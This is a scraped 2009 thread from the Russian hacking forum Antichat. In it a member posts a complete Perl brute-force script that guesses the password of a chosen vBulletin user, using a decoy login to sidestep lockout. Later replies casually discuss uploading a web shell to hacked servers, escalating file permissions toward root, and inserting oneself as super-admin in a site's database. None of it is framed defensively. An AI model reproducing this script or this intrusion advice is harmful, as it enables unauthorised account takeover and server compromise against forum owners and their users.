Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.05.2009, 14:29
|
|
Новичок
Регистрация: 14.12.2008
Сообщений: 5
Провел на форуме:
31958
Репутация:
0
|
|
люди, существует вообще брут аков с булки? если да, то чирканите плз
|
|
|
17.05.2009, 16:58
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 12
Провел на форуме:
398460
Репутация:
23
|
|
Сообщение от yaroslav-ranger
люди, существует вообще брут аков с булки? если да, то чирканите плз
Да)
Код:
#!/usr/bin/perl
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);
$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars
print q(
###########################################################
# vBulletin brute forcer #
# http://www.unnamedone.com #
# brian_denys@hotmail.com #
# 09 - April - 2008 #
################## Coded By UnnamedOne ####################
);
if (@ARGV < 4)
{
print " # Я не отвечаю за что-нибудь, что вы удовлетворяетесь с этим!\n";
print " # Тестировалось только версиях vBulletin 3.6.8 and 3.7.0!\n";
print " # usage : vbrute.pl [host & path] [user] [pass] [target]\n";
print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";
exit();
}
fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
crack($t);
}
sub fakelogin {
$xplr = LWP::UserAgent->new() or die;
$cookie_jarr = HTTP::Cookies->new();
$xplr->cookie_jar( $cookie_jarr );
$resr = $xplr->post($url.'login.php?do=login',
Content => [
"vb_login_username" => "$usern",
"vb_login_password" => "$passw",
"do" => "login",
],);
if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
#Do nothing..
}
else
{
#print $cookie_jarr->as_string;
print "Forum not vulnerable or wrong username / password.\n";
exit();
}
}
sub crack {
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++) {
$RawString[i] = 0;
}
$Start = gettimeofday();
do {
for (my $i =0;$i<$CharSet;$i++)
{
if ($RawString[$i] > length($alpha)-1) {
if ($i==$CharSet-1) {
$cnt = 0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$CharSet;$i++) {
$ret = $ret . substr($alpha,$RawString[$i],1);
}
$count++;
if($count == 4) {
fakelogin();
$count = 0;
}
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'login.php?do=login',
Content => [
"vb_login_username" => "$uname",
"vb_login_password" => "$ret",
"do" => "login",
],);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr) {
$cnt = int($cnt/$dbgtmr);
$Start = gettimeofday();
}
$logins++;
system("clear");
$pro = ($logins / ($charcount * $maxchars));
print "Current password: $ret\n";
print "Login attempts: $logins\n";
print "Cracking speed: $cnt passwords/sec\n";
print "$pro% finished.\n";
$cnt = 0;
if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
print "Password cracked! => $ret\n";
exit();
}
$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}
|
|
|
|
17.05.2009, 17:09
|
|
Новичок
Регистрация: 14.12.2008
Сообщений: 5
Провел на форуме:
31958
Репутация:
0
|
|
пасиб, щас попробую с ним разобратся ещё
всё, разобрался))
Последний раз редактировалось yaroslav-ranger; 17.05.2009 в 17:15..
Причина: разобрался
|
|
|
|
17.05.2009, 20:50
|
|
Новичок
Регистрация: 28.08.2008
Сообщений: 2
Провел на форуме:
611
Репутация:
0
|
|
А разве на булке нет ограничения неправильных вводов пароля?
И куда этот код пихать? В компилятор perl? Или заливать на хостинг с поддержкой перла?
|
|
|
|
06.06.2009, 09:54
|
|
Новичок
Регистрация: 24.05.2009
Сообщений: 2
Провел на форуме:
84947
Репутация:
1
|
|
кто разбирается в форумах пхпбб отпишите 459902747
|
|
|
|
09.06.2009, 07:56
|
|
Познающий
Регистрация: 22.05.2008
Сообщений: 53
Провел на форуме:
824985
Репутация:
15
|
|
Ребята, скажите где можно скачать vBulletin 3.5.3? чтоб можно было его поюзать, посмотреть исходники?
vBulletin.com не предлагать, там реитсрация нужна и покупка лицензии.
|
|
|
|
09.06.2009, 09:01
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.
|
|
|
|
09.06.2009, 09:27
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от Komyak
Возник вопрос с чемодом. Плохо разбираюсь. После заливки шелла пытаюсь поменять права на доступ, но постоянно выдаёт ошибку. Если и могу изменить, то только в "меньшую" сторону. Подскажите, может что не так делаю? В madShell отмечаю файл(папку) и выбираю чемод, выставляю нужные мне права, но после нажатия кнопки сохранить вылетает ошибка.
Ну у тебя прав нету..чтобы изменить чмод на данную папку.)..
Ну или..что за ошибка?)
|
|
|
|
09.06.2009, 11:54
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Сообщение от DimOnOID
Ну у тебя прав нету..чтобы изменить чмод на данную папку.)..
Ну или..что за ошибка?)
Именно, он и выдает что не зватает персимисинов =) 99% серваков закрыто, но попадаются... А никак нельзя обойти?
И ещё может кто сталкивался с такой проблемой: открываю sql-базу, прописываю себя админом, но когда пытаюсь зайти- эта сволочь не пускает. Приходится менять наст.админу пасс, заходить в админку и вставлять в ему пароль обратно, в базу.
так вот, когда захожу, то в пользователях вижу свой ник(который залил) с правами супер.админа, но войти под-своими данными всё равно не могу. Не слишком путанно объяснил?
|
|
|
|
09.06.2009, 13:06
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от Komyak
Именно, он и выдает что не зватает персимисинов =) 99% серваков закрыто, но попадаются... А никак нельзя обойти?
И ещё может кто сталкивался с такой проблемой: открываю sql-базу, прописываю себя админом, но когда пытаюсь зайти- эта сволочь не пускает. Приходится менять наст.админу пасс, заходить в админку и вставлять в ему пароль обратно, в базу.
так вот, когда захожу, то в пользователях вижу свой ник(который залил) с правами супер.админа, но войти под-своими данными всё равно не могу. Не слишком путанно объяснил?
Обойти...м..ну разве что получить root'a или ftp доступ...(ну или ssh акк юзера с правами)
Насчёт админа...а ты не думал что где то в конфигах(не в базе) прописан ник/id администраторов?(типа дополнительная защита)...что за движок?....
Последний раз редактировалось DimOnOID; 09.06.2009 в 13:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
